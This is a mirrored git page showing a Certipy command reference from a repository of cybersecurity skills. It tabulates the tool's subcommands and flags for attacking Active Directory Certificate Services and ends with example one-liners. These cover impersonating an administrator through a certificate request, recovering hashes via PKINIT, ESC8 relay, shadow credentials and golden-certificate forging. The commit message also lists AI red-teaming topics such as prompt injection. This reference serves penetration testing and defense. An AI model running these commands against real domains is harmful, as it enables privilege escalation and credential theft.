creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-26 11:44:37 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
768ca51c8d331ab0bdcea8ffb31c9b99bb2c1839
Anthropic-Cybersecurity-Skills/skills/exploiting-adcs-with-certipy/references/api-reference.md
T
mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817) 
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
2026-06-22 19:08:16 +02:00

3.2 KiB
Raw Blame History

Certipy Command Reference

Package: certipy-ad (binary: certipy). Source: https://github.com/ly4k/Certipy/wiki

Subcommands

Subcommand Purpose
certipy find Enumerate CAs, templates, and enrollment endpoints; flag ESC vulnerabilities
certipy req Request (or forge via SAN) a certificate from a template
certipy auth Authenticate with a PFX via PKINIT/Schannel; recover TGT + NT hash
certipy relay Relay coerced NTLM into AD CS HTTP/RPC web enrollment (ESC8/ESC11)
certipy shadow Shadow Credentials attack on msDS-KeyCredentialLink
certipy ca Manage/backup the CA, enable templates, manage officers
certipy template Read/modify certificate template configuration (ESC4)
certipy forge Forge a Golden Certificate from a stolen CA key
certipy account Create/modify/query machine and user accounts
certipy cert Manipulate PFX/PEM certificate files (convert, extract)

Common Authentication Flags

Flag Meaning
-u USER@DOMAIN Username (UPN form)
-p PASSWORD Cleartext password
-hashes [LM]:NT Pass-the-hash authentication
-k / -no-pass Use Kerberos ccache (KRB5CCNAME)
-dc-ip IP Domain Controller IP
-ns IP / -dns-tcp DNS resolver / use TCP for DNS
-target HOST Target CA/host FQDN
-debug Verbose output

certipy find Flags

Flag Meaning
-vulnerable Show only templates/CAs Certipy deems vulnerable
-enabled Only enabled templates
-hide-admins Hide built-in admin ACEs in output
-stdout Print report to stdout
-text Write a text report file
-json / -bloodhound Output JSON / BloodHound-ingestible data

certipy req Flags

Flag Meaning
-ca NAME Target Certificate Authority name
-template NAME Certificate template to enroll in
-upn UPN SAN UserPrincipalName to impersonate (ESC1)
-dns NAME SAN dNSName to impersonate
-sid SID Embed objectSid (strong mapping)
-pfx FILE Output PFX path
-application-policies OID ESC15 application policy abuse

certipy relay Flags (ESC8/ESC11)

Flag Meaning
-target http://CA HTTP web enrollment target (ESC8)
-target rpc://CA RPC ICertPassage target (ESC11)
-template NAME Template to request (e.g. DomainController, User)
-ca NAME CA name when relaying

certipy shadow Flags

Flag Meaning
shadow auto Add KeyCredential, auth, dump hash, restore — end to end
shadow add/list/clear/info Granular KeyCredential operations
-account NAME Target account (victim, dc$)

Example One-Liners

certipy find -u u@corp.local -p 'pw' -dc-ip 10.0.0.100 -vulnerable -stdout
certipy req -u u@corp.local -p 'pw' -ca CORP-CA -template VulnTpl -upn administrator@corp.local -sid S-1-5-21-...-500
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.100
certipy relay -target http://CA.CORP.LOCAL -template DomainController
certipy shadow auto -u u@corp.local -p 'pw' -dc-ip 10.0.0.100 -account victim-dc$
certipy forge -ca-pfx CORP-CA.pfx -upn administrator@corp.local
Reference in New Issue View Git Blame Copy Permalink